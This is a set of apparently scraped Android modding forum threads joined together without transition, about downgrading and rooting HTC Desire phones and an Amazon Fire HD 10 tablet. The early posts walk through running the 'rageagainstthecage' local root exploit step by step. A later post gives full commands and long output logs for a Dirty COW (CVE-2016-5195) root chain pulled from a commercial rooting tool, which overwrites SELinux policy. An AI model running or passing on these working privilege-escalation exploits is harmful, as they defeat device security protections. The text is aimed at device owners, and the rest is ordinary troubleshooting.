After my new Desire updated by OTA to 2.2, my HBoot upgraded to 0.93.001
As a result, I am no longer to root it again or flashing any cooked rom.... It is such a nightmare for me. So I decided went to HTC service center and asking for a factory restore to Android 2.1, unfortunately the guy stated that due to my personal's fault - to hack the bootloader, there is no way to downgrade the software anymore. I need to pay extra money for a circuit board replacement. I am so angry with the replied, my phone actaully working fine with OTA 2.2 version (it is official release for Taiwan), all I want to do is requested for downgrade to official 2.1, why I need to replace a circuit board????
Anyway after a few hours, I figure out a solution and now working fine with Hboot 0.8 and then re-flashed to customized cooked FroYo rom
Here is the steps: (be careful, I am not responisable for any demage due to these procedures, also you need to have basic knowledge on using Android adb tools)
0.) Download this good program: http://evo4g.me/downloads/evo-root.zip (Credit goes to djR3Z)
Download this file to "PB99IMG.zip" http://shipped-roms.com/shipped/Bra...8U_4.06.00.02_2_release_126984_signed_txt.zip
1.) Make a NEW Goldcard (best using FAT32 format micro SD 4GB or 2GB)
http://www.klutsh.com/dlfiles/GoldCardTool-0.0.5.rar
2.) Find your CID ==> e.g HTC__622 (someone said all 11111111 also worked, but if you can query, why not to input your own?)
fastboot oem boot <--- run this command, will show your own CID
3.) http://ks33673.kimsufi.com/misc/
and Create your own "mtd0.img"
>adb push flash_image /data/local/
>adb push rageagainstthecage-arm5.bin /data/local/tmp/
>adb push mtd0.img /sdcard/
>adb push PB99IMG.zip /sdcard/
>adb shell
chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
chmod 0755 /data/local/flash_image
cd /data/local/tmp
./rageagainstthecage-arm5.bin
If you see:
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3319, 3319}
[*] Searching for adb ...
[+] Found adb as PID 74
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] [email protected] so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
> adb shell
# <---- you will see this good prompt
cd /data/local
./flash_image misc /sdcard/mtd0.img <---- make sure your connected to PC not in Disk drive mode
5.Shutdown your device
6.Hold volume DOWN and press power button
7.Wait until PB99IMG.ZIP was found and verfied. If that fails, check if you named the file the right way and it’s located in the root of your SD.
8.Press volume UP to start the update.
9.Wait until all steps are done. DON’T POWER OFF YOUR DEVICE!
10.After the downgrade progress has finished press volume UP to reboot.
Now you back to 2.1 with HBoot 0.80
(Please remember to delete the file PB99IMG.zip from your SDcard / folder)
If you want root again:
Navigate to http://www.unrevoked.com for rooted as usual
Interesting, a root exploit for froyo has been found? Though any downgrade of hboot is unnecessary. The rooting allows you to fix the misc partition which will let you flash any RUU you want.
My Desire show : Main Version is older! Update Fail!
setupspeed said:
My Desire show : Main Version is older! Update Fail!
Click to expand...
Click to collapse
what is the issue?
tell me what steps being failed...
hkfriends said:
what is the issue?
tell me what steps being failed...
Click to expand...
Click to collapse
read PB99IMG.ZIP finish , then checking PB99IMG.ZIP => fail
setupspeed said:
read PB99IMG.ZIP finish , then checking PB99IMG.ZIP => fail
Click to expand...
Click to collapse
Have u flashed Mtd0.img ok?
hkfriends said:
Have u flashed Mtd0.img ok?
Click to expand...
Click to collapse
Mtd0.img ok , pursuant step => still fail
better add some screenshoot bro
I have got hboot 0.93 with vodafone froyo and an amoled-display (no slcd).
Do the method of
android-tutorials.org/dev/?page_id=78
work (sorry, can't post the hole link because I an new registered, add www)?
Or do I have to use the method from post #1 in this thread?
cordezz said:
I have got hboot 0.93 with vodafone froyo and an amoled-display (no slcd).
Do the method of
android-tutorials.org/dev/?page_id=78
work (sorry, can't post the hole link because I an new registered, add www)?
Or do I have to use the method from post #1 in this thread?
Click to expand...
Click to collapse
Try teppic74's tool, i think it will be more easy and the same as mine too!
http://forum.xda-developers.com/showthread.php?t=768256
C:\adb>adb push flash_image /data/local/
adb server is out of date. killing...
* daemon started successfully *
774 KB/s (26172 bytes in 0.033s)
C:\adb>adb push rageagainstthecage-arm5.bin /data/local/tmp/
478 KB/s (5392 bytes in 0.011s)
C:\adb>adb push mtd0.img /sdcard/
1807 KB/s (655360 bytes in 0.354s)
C:\adb>adb push PB99IMG.zip /sdcard/
1550 KB/s (144169877 bytes in 90.807s)
C:\adb>adb shell
$ chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
$ chmod 0755 /data/local/flash_image
chmod 0755 /data/local/flash_image
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage-arm5.bin
./rageagainstthecage-arm5.bin
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3319, 3319}
[*] Searching for adb ...
[+] Found adb as PID 671
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] [email protected] so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
C:\adb>adb shell
adb server is out of date. killing...
* daemon started successfully *
# cd /data/local
cd /data/local
# ./flash_image misc /sdcard/mtd0.img
./flash_image misc /sdcard/mtd0.img
# exit
exit
C:\adb>
-------------------------------------------------------------
my step , correct?
Yes, seems corrected..
have you made gold card?
what is your phone? OEM or branded?
what is the original Hboot version?
setupspeed said:
C:\adb>adb push flash_image /data/local/
adb server is out of date. killing...
* daemon started successfully *
774 KB/s (26172 bytes in 0.033s)
C:\adb>adb push rageagainstthecage-arm5.bin /data/local/tmp/
478 KB/s (5392 bytes in 0.011s)
C:\adb>adb push mtd0.img /sdcard/
1807 KB/s (655360 bytes in 0.354s)
C:\adb>adb push PB99IMG.zip /sdcard/
1550 KB/s (144169877 bytes in 90.807s)
C:\adb>adb shell
$ chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
$ chmod 0755 /data/local/flash_image
chmod 0755 /data/local/flash_image
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage-arm5.bin
./rageagainstthecage-arm5.bin
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3319, 3319}
[*] Searching for adb ...
[+] Found adb as PID 671
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] [email protected] so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
C:\adb>adb shell
adb server is out of date. killing...
* daemon started successfully *
# cd /data/local
cd /data/local
# ./flash_image misc /sdcard/mtd0.img
./flash_image misc /sdcard/mtd0.img
# exit
exit
C:\adb>
-------------------------------------------------------------
my step , correct?
Click to expand...
Click to collapse
hkfriends said:
Yes, seems corrected..
have you made gold card?
what is your phone? OEM or branded?
what is the original Hboot version?
Click to expand...
Click to collapse
gold card => yes
My phone => HTC Desire
Hboot version => 0.93.0001
i have this error "error writing misc: Permission denied"
in this step: "./flash_image misc /sdcard/mtd0.img"
Noob question
Using your method wont brick my phone right? My phone details are below:
Unit: HTC Desire
ROM: FroYo OTA (Unbranded)
BOOTLoader: 0.93
Software:2.13.707.1
Kernel:2.6.32.15
Just use my tool instead, it's much easier.
Doesn't Unrevoked3, the tool that is used to root phones, support hboot 0.93 on unbranded / unlocked phones? So this step is un-necessary on unbranded / unlocked phones?
Did it work at all?
Hi,
I too want to downgrade my HTC Desire from 2.2 to 2.1 because after the upgrade to 2.2 with hboot 0.93 my desire has stopped connecting to the H or 3g network.
Did this guide work for anyone at all?
HI
CAN SOME HELP ME TO GET THE ROM IMAGE VERSION 2.13.707.1 I NEED THE EXE. FILE THATS THE ONLY WAY I KNOW TO INSTALL THE ROM!!!!
MY PHONE TRIED TO UPGRADE FROM THE PHONE SOMETHING WENT WRONG AND IT SWITCH ON AND GET STUCK IN WHITE SCREEN WITH htc GREEN LOGO . . . I TRIED TO INSTALL THE ROM FROM MY COMPUTER THE LATEST BUT THE IMAGE ON THAT IS 2.10.405.2 . I REALLY APPRECIATE IF SOMEONE CAN HELP ME
black screen
I got a black screen after downgrade. Also after restart the phone
Desire
So I'm on rogers trying to change my CID. When I used the one click all it did was say it couldn't be found. All other batch installers just open up in command prompt and close again..... I have usb debugging turned on and I have it in charge only. My current RUU is 1.73. My boot loader is unlocked and I am rooted.
I've even tried the Linux tool and it all it did was say ./adb was not valid.
Sorry if If I'm being a complete idiot here but I want to start trying custom roms...
bobruels44 said:
So I'm on rogers trying to change my CID. When I used the one click all it did was say it couldn't be found. All other batch installers just open up in command prompt and close again..... I have usb debugging turned on and I have it in charge only. My current RUU is 1.73. My boot loader is unlocked and I am rooted.
I've even tried the Linux tool and it all it did was say ./adb was not valid.
Sorry if If I'm being a complete idiot here but I want to start trying custom roms...
Click to expand...
Click to collapse
For the Linux tool (which I wrote), you downloaded the file, extracted the archive, opened a terminal window IN the archive folder, typed "chmod +x toolbox.sh" <enter> and then "./toolbox.sh" <enter>?
If so, try going back to the terminal window and typing "chmod +x adb" <enter> and then "./toolbox.sh" <enter>
HTH,
Billy
Sent from my HTC One X using Tapatalk 2
yes that is what I did and all it did was say /adb is not a valid command...
I was in the correct directory as I could open the tool,
then when installing the drivers for example all it said was
\adb is not a recognized command
Almost done, please reboot your computer now....
bobruels44 said:
yes that is what I did and all it did was say /adb is not a valid command...
I was in the correct directory as I could open the tool,
then when installing the drivers for example all it said was
\adb is not a recognized command
Almost done, please reboot your computer now....
Click to expand...
Click to collapse
JeepFreak said:
If so, try going back to the terminal window and typing "chmod +x adb" <enter> and then "./toolbox.sh" <enter>
Click to expand...
Click to collapse
The above should work, but if not, try downloading the tool again and starting from the beginning. I made a small change that might help. Were you using the SuperCID script or the One XL Toolbox?
http://www.slicky.net/code/onexl/OneXL-Toolbox.tar.gz
http://www.slicky.net/code/onexl/SuperCID-OneXL.tar.gz
HTH,
Billy
Ive tried both actually.
Here is the error message from the tool box..
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
cp: cannot stat `tmp/mmcblk0p4': No such file or directory
xxd: tmp/mmcblk0p4: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
We don't recognize your current CID. If you're sure that your
phone is the S4 version, HTC One XL, contact me on XDA and I
will see if I can get you going.
I am rooted and the bootloader is unlocked.....
Could it be because I'm still S-ON? I just kinda figured that everyone was still S-ON.....
Edit:
There is a HIGH chance I'm being an idiot and missing something stupid...
bobruels44 said:
Ive tried both actually.
Here is the error message from the tool box..
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
cp: cannot stat `tmp/mmcblk0p4': No such file or directory
xxd: tmp/mmcblk0p4: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
We don't recognize your current CID. If you're sure that your
phone is the S4 version, HTC One XL, contact me on XDA and I
will see if I can get you going.
I am rooted and the bootloader is unlocked.....
Could it be because I'm still S-ON? I just kinda figured that everyone was still S-ON.....
Edit:
There is a HIGH chance I'm being an idiot and missing something stupid...
Click to expand...
Click to collapse
Hmmmm... type "ls -l" <enter> from a terminal in the toolbox directory. (That's "LS -L", but lower case, btw). Copy and paste the output here.
Billy
@ubuntu:~/Desktop/OneXL-Toolbox$ ls -l
total 2922
-rw-rw-r-- 1 casey casey 82 May 23 18:13 51-android.rules
-rwxrwxr-x 1 casey casey 159644 May 9 09:34 adb
-rw-rw-r-- 1 casey casey 42916 May 6 01:36 apstacon.conf
-rw-rw-r-- 1 casey casey 2005736 Dec 28 22:32 busybox
-rw-rw-r-- 1 casey casey 42940 May 6 01:36 hostapd_default.conf
-rw-rw-r-- 1 casey casey 136 May 25 20:41 README..txt
-rw-rw-r-- 1 casey casey 91980 May 7 22:23 su
-rw-rw-r-- 1 casey casey 570342 May 7 22:22 Superuser.apk
-rw-r--r-- 1 casey casey 12288 May 22 19:14 telephony.db
-rw-r--r-- 1 casey casey 12288 May 23 19:51 telephony.db.virgin
drwxrwxr-x 2 casey casey 1024 May 28 16:14 tmp
-rwxrwxr-x 1 casey casey 15101 May 29 08:48 toolbox.sh
-rwxrwxr-x 1 casey casey 9947 May 28 09:25 undo-toolbox.sh
-rw-rw-r-- 1 casey casey 4436 May 6 01:33 WCNSS_qcom_cfg_default.ini
-rw-rw-r-- 1 casey casey 351 May 23 10:50 wpa_supplicant.conf
Oh, you know what... I bet you need to install the ncurses library. Do you know how to do that? If not, what package manager do you use (rpm, yup, aptitude, etc)? Or what Linux distribution are you running?
Billy
Sent from my HTC One X using Tapatalk 2
I use ubuntu...
I'm not familiar with those... my knowledge of Linux is really based down to school uses where they get mad if you start installing software. However I am familiar with a command prompt so I'm only mostly useless
bobruels44 said:
I use ubuntu...
I'm not familiar with those... my knowledge of Linux is really based down to school uses where they get mad if you start installing software. However I am familiar with a command prompt so I'm only mostly useless
Click to expand...
Click to collapse
HAHA. Is it a 64 bit system? If so, try this:
"sudo apt-get install ia32-libs" <enter>
If not, LMK,
Billy
Download this Guide ...
Try downloading the Guide from the first post in the following link:
http://forum.xda-developers.com/showthread.php?t=1678308
Go to Step 2 on Page 10.
Peter
Desire S
Hboot 2.00.2002 o-on rl dev->unlocked
instaled = rooted stock RUU_SAGA_ICS_35_S_HTC_EU_14.01.401.2_20.76.30.0835_3831.19.00.110_275068
when i replace boot.img ...from ---> .V7.1 STABLE FOR SENSE 4 | EXPERIMENTAL FOR SENSE 3.6/MIUIv4
I only got black screen and reboot to recovery (after some time)
flashing org boot.img from ruu zip ... restores phone operation again
Why is this kernel not working .. because of hboot???
(installed busybox 1.20.2 with busysbox installer from market)... ?
Thanks for HELP!
Hboot 2.00.2002 is ENG S-OFF
Yours probably is 2.02.0002. Be more careful about such things.
You have to modify one number in the zip before flash. Read the kernel thread again
Sent from my HTC Desire S
amidabuddha said:
Hboot 2.00.2002 is ENG S-OFF
Yours probably is 2.02.0002. Be more careful about such things.
You have to modify one number in the zip before flash. Read the kernel thread again
Sent from my HTC Desire S
Click to expand...
Click to collapse
ok! mine is is 2.02.0002. ----- > S-ON Rl (****unlocked****)
"
mount("ext4", "EMMC", "/dev/block/mmcblk0p29", "/system/lib"); --- The line is totaly missing from "updater-script" in Tweaked3_7.1-Sense3.6-bcm4329.zip
adding mount line with 28 or 29 does not solve the issue :/ .... but 29 should be the right one.. as i looked up mount command in terminal... and system/lib is --> dev/block/mmcblk0p29
Flashing ZIP with 4ext recovery (latest)...
Obviously you dont like to read instructions.
Sense3.6 is for custom ROMs not for Stock
Anyway there is a new installer - use it
Sent from my HTC Desire S
amidabuddha said:
Obviously you dont like to read instructions.
Sense3.6 is for custom ROMa not for Stock
Anyway there is a new installer use it
Sent from my HTC Desire S
Click to expand...
Click to collapse
ok. New installer works.
oTeMpLo said:
ok. New installer works.
Click to expand...
Click to collapse
stock ics rom.
8.0 installer fails to create init.d folder !!!! /system/etc/init.d .. after manualy creating it .. it copies scripts to init.d folder,,
after that ficing permissions with fix_perm.bat .. as some init.d scrips have wring pemissions..
but modules still don't get loaded.
lsmod --> only wifidriver listed.
no zram ---> ecet...
free returns ---> swap 0 0 0
manualy starting ./51-zram works!!!
just init.d scripts dont get processed.
oTeMpLo said:
stock ics rom.
8.0 installer fails to create init.d folder !!!! /system/etc/init.d .. after manualy creating it .. it copies scripts to init.d folder,,
after that ficing permissions with fix_perm.bat .. as some init.d scrips have wring pemissions..
but modules still don't get loaded.
lsmod --> only wifidriver listed.
no zram ---> ecet...
free returns ---> swap 0 0 0
manualy starting ./51-zram works!!!
just init.d scripts dont get processed.
Click to expand...
Click to collapse
Code:
adb shell chmod 750 /system/etc/init.d/{scriptname}
adb shell chown 0.2000 /system/etc/init.d/{scriptname}
reboot
amidabuddha said:
Code:
adb shell chmod 750 /system/etc/init.d/{scriptname}
adb shell chown 0.2000 /system/etc/init.d/{scriptname}
reboot
Click to expand...
Click to collapse
yes i run fix_perm.bat
[email protected]:/system/etc/init.d # ls -l
ls -l
-rwxr-x--- root shell 157 2012-10-02 21:31 50-s2wEB
-rwxr-x--- root shell 68 2012-10-02 21:31 52-cifs
-rwxr-x--- root shell 107 2012-10-02 21:31 54-ntfs
-rwxr-x--- root shell 80 2012-10-02 21:31 53-kineto_gan
-rwxr-x--- root shell 117 2012-10-02 21:31 51-zram
[email protected]:/system/etc/init.d #
[email protected]:/system/lib/modules # ls -l
ls -l
-rw-r--r-- root root 320724 2008-08-01 14:00 bcm4329.ko
-rw-r--r-- root root 3118416 2012-10-02 21:31 cifs.ko
-rw-r--r-- root root 2262132 2012-10-02 21:31 ntfs.ko
-rw-r--r-- root root 29536 2012-10-02 21:31 nls_utf8.ko
-rw-r--r-- root root 175844 2012-10-02 21:31 kineto_gan.ko
-rw-r--r-- root root 218212 2012-10-02 21:31 zram.ko
[email protected]:/system/lib/modules #
Any other idea?
installed busybox 1.20.2 in /system/xbin ... some comands are still inked to "toolbox" ?!?
Thanks for help!
Check if /system/xbin/run-parts is there
amidabuddha said:
Check if /system/xbin/run-parts is there
Click to expand...
Click to collapse
[email protected]:/system/xbin # ls -l run*
ls -l run*
lrwxrwxrwx root root 2012-10-02 21:08 run-parts -> /system/xbin/busybox
[email protected]:/system/xbin #
[email protected]:/system/xbin # ls -l busy*
ls -l busy*
-rwxr-xr-x root root 863436 2012-10-02 21:08 busybox
[email protected]:/system/xbin #
oTeMpLo said:
[email protected]:/system/xbin # ls -l run*
ls -l run*
lrwxrwxrwx root root 2012-10-02 21:08 run-parts -> /system/xbin/busybox
[email protected]:/system/xbin #
[email protected]:/system/xbin # ls -l busy*
ls -l busy*
-rwxr-xr-x root root 863436 2012-10-02 21:08 busybox
[email protected]:/system/xbin #
Click to expand...
Click to collapse
.. ok now it works.... reboot afer remove in new install of busybox.....
tanks for Patiens with me!!! ....
Update: While this still works, there's an easier method here. Please try that first.
Disclaimer #1: KingoRoot, dr.fone, and most other one-click rooting tools are characterized as malware. Should you use these tools? That decision is yours and yours alone. I do not own any of the tools that follow. All the links are to files that are publicly available.
Disclaimer #2: This is a risky undertaking. If you encounter issues or, worse, end up with a brick, I (or the others here) will try to help you, but the risk is all yours.
Disclaimer #3: This approach is not for everyone. If you lack a half-decent linear combination of (1) troubleshooting skills, (2) patience, (3) reading-comprehension skills, and (4) some love of risk, please stop here.
Disclaimer #4: I have only tried this on the 2017 HD 10. If you try this on another device type and it works, please post in the appropriate forum. If you try this on another device type and it does not work, don't be shocked.
NAQ (Never-Asked Questions):
a. What is "offline" rooting?
-- Rooting your device without needing access to the Internet (i.e., the rooting process requires no Internet connection; not on the phone/tablet, not on the computer).
b . Aren't there a gazillion rooting threads for the 2017 HD 10, each claiming to be easier than its predecessors? Why even bother with this fancy "offline" stuff?
-- All of those rooting threads use tools that require Internet access on the PC. What if those tools stop working because of server issues on their end?
-- More importantly, it's well known that these one-click rooting tools extract and transmit a ton of device-identifying information (e.g., IMEI, Serial Number, ...) that is not central to the rooting process. Why give that up?
For a few weeks now, I have been trying to come up with a rooting process that does not require any Internet access on the computer (we know KingoRoot and dr.fone need Internet access on the computer). I have finally figured out how. As a result, we should be able to root the 2017 HD 10 even if these rooting options cease to exist (assuming Amz updates are blocked at 5.6.0.1).
While Kingo does a good job of hiding its root exploits (i.e., the scripts it fetches from the cloud), the good doctor is a bit more generous (its files are downloaded onto a folder on the disk). I copied everything from that folder after a successful root attempt on my test tablet and examined each file. I was able to tinker with the scripts and binaries after moving them to /data/local/tmp on my tablet, but wasn't able to achieve anything meaningful ... until tonight. Noting the presence of some weirdly-named files in that folder, I did a simple Google search and came up with this hit. Of particular interest is method 2 (ELF). Based on that reading and armed with the files from the folder on the disk, I was able to achieve root without Internet access on my computer. I have done so multiple times, w/ and w/o a fresh sideload of the 5.6.0.0 update .bin. The process succeeds more often than it fails (when it does fail, a reboot and retry usually works), not unlike failures with Kingo or the doctor. It's the same exploit after all.
I am guessing Kingo uses a similar process, but does enough to make its scripts difficult to obtain offline. Access to the doctor's scripts and some clarity on the rooting procedure should help others on this forum make even greater progress.
Update: See my post #10 in this thread for Kingo-related instructions. To do this with Kingo, you would complete steps 4 and 5 in this OP and then move to the steps in post #10.
You will need to download a few files (for which you will, of course, need Internet on your computer):
1. Download the exploits here (it's clear that the exploit that's working for the 2017 HD 10 is Dirty COW: CVE-2016-5195): 20165195.zip and SuperSU_18+.zip and extract to their respective folders.
2. Copy all the files from the SuperSU_18+ folder into the 20165195 folder (overwriting wsroot.sh). Rename 20165195 to something simpler, say c. Inside the c folder, you should have the following binaries and scripts: ddexe, debuggerd, fileWork, install-recovery.sh, Matrix, pidof, start_wssud.sh, su, su_arm64, Superuser.apk, supolicy, toolbox, and wsroot.sh. You can delete Superuser.apk (we will be downloading SuperSU next).
3. Download the SuperSU 2.82 SR5 apk from here (or search for another source). Move it to the c folder.
4. Install the Fire's drivers and ADB+fastboot from here (if you haven't already done so).
You will not need Internet access from this point forward.
You should now have the c folder with 12 files and the SuperSU apk handy. If you lose root for whatever reason (or if you just want to test this out), you do not need KingoRoot or dr.fone. Follow these steps:
5. Do the basics:
-- Fire up your Fire.
-- On your first boot, start the process by clicking on Continue, then click on any of the WiFi choices, click Cancel, choose Not Now, and then Skip. Once the Fire gets to the home screen, pull down the notification bar and enable airplane mode.
-- Become a developer by tapping Serial Number (in Device Options) 7 times, go to Developer Options, and Enable ADB.
-- Go to Security in Settings and enable Apps from Unknown Sources.
-- Connect your Fire to the computer, Allow USB debugging on the tablet, check the popup box to Always allow from this computer (if this does not happen here, it will when you start adb next).
-- Type adb shell in an administrative command prompt. You should enter the tablet as a user.
6. On your computer, copy all the files from the c folder to the Fire's internal storage (/sdcard). Next, go to the command prompt with adb shell and copy the files to /data/local/tmp:
Code:
cp /sdcard/c/* /data/local/tmp
cd /data/local/tmp
ls -l
7. Change permissions:
Code:
chmod 755 *
8. This is the ballgame: Run:
Code:
./Matrix /data/local/tmp 2
This tells Matrix to look for files in /data/local/tmp, with "2" installing su in /system/xbin ("1" installs su8 in /system/xbin). Wait for the process to complete (it will take a minute or two). If it's successful, you will see something like the following as it completes:
Code:
[*] exploited 0x7f83021000=f97cff8c
end!!!!!!!
<WSRoot><Exploit>0</Exploit></WSRoot>
<WSRoot><Done>0</Done></WSRoot>
If it does not report success as depicted above (note that the memory address exploited might be different, but the end result has to be a "0" and "Done"), delete everything from /data/local/tmp/, (hard) reboot the tablet, and retry (starting from step 5). Failure is likely if an exploit check takes greater than 30 seconds, in which case the device may have to be manually rebooted.
This is a sample of the entire output that should be generated:
Code:
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7f8325c008 end:7f8325c2d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 210148 /data/local/tmp/load1
fwrite is count 54204 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 408a0 load1 = 334e4 load2 = d3bc
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:264352
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:208
find logd pid : d0
_inject_start_s:0x7f8325c008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 210148
[*] mmap 0x7f83055000;
[*] exploit (patch)
[*] currently 0x7f83055000=8f97cff8c
sched_setaffinity: Function not implemented[*] madvise = 0x7f83055000 210148
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
check done
sched_setaffinity: Function not implementedmadviseThread() done
procselfmemThread() done
[*] exploited 0x7f83055000=f97cff8c
[main]p_vdso_addr:0x7f8325a000 p_vdso_buffer:0x400000
[*]set_ret_jmp
[*]set_ret_jmp 400410
[*]set_ret_jmp 400420
[main] write 1
Parent is over..status == 0
socket: No such file or directory
socket = 7
ret = ffffffff
connect
: No such file or directory
ret = ffffffff
find coe f
[main] write 2
Parent is over..status == 0
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load2
warning: new file size (54204) and file old size (210148) differ
size: 54204
[*] mmap 0x7f83236000;
[*] exploit (patch)
[*] currently 0x7f83236000=8f97cff8c
sched_setaffinity: Function not implemented[*] madvise = 0x7f83236000 54204
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
check done
sched_setaffinity: Function not implementedmadviseThread() done
procselfmemThread() done
[*] exploited 0x7f83236000=8600a5
find coe 36
Parent is over..status == 0
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/cp_sepolicy
size: 210148
[*] mmap 0x7f83021000;
[*] exploit (patch)
[*] currently 0x7f83021000=10007008600a5
checking the patch ... exploit
sleep 1s
sched_setaffinity: Function not implementedsched_setaffinity: Function not implemented[*] madvise = 0x7f83021000 210148
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
check done
madviseThread() done
procselfmemThread() done
[*] exploited 0x7f83021000=f97cff8c
end!!!!!!!
<WSRoot><Exploit>0</Exploit></WSRoot>
<WSRoot><Done>0</Done></WSRoot>
9. Confirm by getting to a root shell:
Code:
su
10. Install SuperSU from /sdcard/c/ (you can just click on Docs on your home screen, go to local storage, then the c directory, and install the apk).
11. Open SuperSU and update binary as Normal (should be successful).
12. Click to reboot.
13. Set SuperSU to Grant as default access.
14. Delete the two wondershare directories in /data/data-lib/:
Code:
cd /data/data-lib
rm -r com.wondershare.DashRoot
rm -r wondershare
15. Not required: Perform other cleanup as needed (look for files in /system/xbin, /system/bin, /data, ... based on install date/time, etc.). Mount /system writable if you're going to be cleaning up items in /system:
Code:
su
mount -w -o remount /system
This is great. A nice framework to add new exploits and fuzz existing ones for previously non rootable devices.
Now we just need meltdown code..
Sent from my iPhone using Tapatalk
@retyre - Great effort!
I am eagerly awaiting the report of your findings!
I am surprised that Amazon has not started pushing out a new OTA, it's been 4 weeks now since the first rooting report. Xmas must have gotten in the way, or the guy who knew how to patch holes quit
Btw, there is the oldie but goodie - an effort to capture Kingoroot actions, you may try to follow it, if you have a bit of time:
https://forum.xda-developers.com/general/general/kingo-root-steals-imei-t3268525
bibikalka said:
[MENTION=3497316]... I am eagerly awaiting the report of your findings! ...
Click to expand...
Click to collapse
As I wrote in the OP, this is confirmed working. That's not what I am worried about here. It's this:
